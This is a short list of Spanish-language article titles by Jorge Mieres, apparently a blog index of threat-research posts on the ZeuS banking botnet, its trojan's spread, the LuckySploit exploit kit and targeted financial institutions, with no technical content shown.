Eficacia de los antivirus frente a ZeuS
Especial!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
ZeuS Carding World Template. (...) la cara de la botnet
Entidades financieras en la mira de la botnet Zeus II
Entidades financieras en la mira de la botnet Zeus I
LuckySploit, la mano derecha de Zeus
ZeuS Botnet. Masiva propagación de su troyano II
ZeuS Botnet. Masiva propagación de su troyano I

Jorge Mieres